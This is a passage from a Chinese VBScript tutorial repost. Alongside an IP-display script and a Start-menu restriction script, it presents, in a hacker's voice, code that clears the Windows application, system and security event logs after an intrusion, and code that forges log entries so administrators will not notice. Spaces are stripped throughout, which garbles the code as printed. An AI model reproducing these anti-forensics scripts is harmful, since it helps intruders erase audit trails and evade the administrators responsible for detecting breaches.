用VBS来代替BAT或CMD文件进行命令第1/2页
作者 佚名
来源 ASP编程
浏览
发布时间 2013-07-09
| P MsgBox"LocalIP="&IPAddress 将上面的内容保存为ShowIP.vbs,双击执行即可得到本机IP地址。 四、利用脚本编程删除日志 入侵系统成功后黑客做的第一件事便是清除日志,如果以图形界面远程控制对方机器或是从终端登陆进入,删除日志不是一件困难的事,由于日志虽然也是作为一种服务运行,但不同于http,ftp这样的服务,可以在命令行下先停止,再删除,在命令行下用netstopeventlog是不能停止的,所以有人认为在命令行下删除日志是很困难的,实际上不是这样,比方说利用脚本编程中的VMI就可以删除日志,而且非常的简单方便。源代码如下: strComputer="." SetobjWMIService=GetObject("winmgmts:"_ &"{impersonationLevel=impersonate,(Backup)}!\\"&_ strComputer&"\root\cimv2") dimmylogs(3) mylogs(1)="application" mylogs(2)="system" mylogs(3)="security" forEachlogsinmylogs SetcolLogFiles=objWMIService.ExecQuery_ ("Select*fromWin32_NTEventLogFilewhereLogFileName=''"&logs&"''") ForEachobjLogfileincolLogFiles objLogFile.ClearEventLog() Next next 将上面的代码保存为cleanevent.vbs文件即可。在上面的代码中,首先获得object对象,然后利用其clearEventLog()方法删除日志。建立一个数组,application,security,system,如果还有其他日志也可以加入数组。然后用一个for循环,删除数组中的每一个元素,即各个日志。 五、利用脚本伪造日志 删除日志后,任何一个有头脑的管理员面对空空的日志,马上就会反应过来被入侵了,所以一个聪明的黑客的学会如何伪造日志。利用脚本编程中的eventlog方法创造日志非常简单,请看下面的代码: setws=wscript.createobject("Wscript.shell") ws.logevent0,"writelogsuccess"''创建一个成功执行日志 将上面的代码保存为createlog.vbs即可。这段代码很容易理解,首先获得wscript的一个shell对象,然后利用shell对象的logevent方法。logevent的用法:logeventeventtype,"description"[,remotesystem],其中eventtype为日志类型,可以使用的参数如下:0代表成功执行,1执行出错,2警告,4信息,8成功审计,16故障审计。所以上面代码中,把0改为1,2,4,8,16均可,引号中的内容为日志描述。利用这种方法写的日志有一个缺点,即只能写到应用程序日志,而且日志来源只能为WSH,即WindowsScriptingHost,所以不能起太多的隐蔽作用,在此仅供大家参考。 六、禁用开始菜单选项 用记事本编辑如下内容: DimChangeStartMenu SetChangeStartMenu=WScript.CreateObject("WScript.Shell") RegPath="HKCR\Software\Microsoft\Windows\CurrentVersion\Policies\" Type_Name="REG_DWORD" Key_Data=1 StartMenu_Run="NoRun" StartMenu_Find="NoFind" StartMenu_Close="NoClose" SubChange(Argument) ChangeStartMenu.RegWriteRegPath&Argument,Key_Data,Type_Name MsgBox("Success!") EndSub CallChange(StartMenu_Run)''禁用“开始”菜单中的“运行”功能 CallChange(StartMenu_Find)''禁用“开始”菜单中的“查找”功能 CallChange(StartMenu_Close)''禁用“开始”菜单中的“关闭系统”功能 将以上代码保存为ChangeStartMenu.vbs文件,使用时双击即可。 七、执行外部程序 用记事本编辑如下内容: DIMobjShell setobjShell=wscript.createObject("wscript.shell") iReturn=objShell.Run("cmd.exe/Csetvar=world",1,TRUE) 保存为.vbs文件即可。在这段代码中,我们首先设置了一个环境变量,其名为var,而值为world,用户可以使用%Comspec%来代替cmd.exe,并且可以把命令:setvar=world改成其它的命令,这样就可以使它可 |
凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢! |
你可能对下面的文章感兴趣
上一篇: 用VBS检测Guest状态的脚本下一篇: vbscript禁用 启用fso的方法
关于用VBS来代替BAT或CMD文件进行命令第1/2页的所有评论
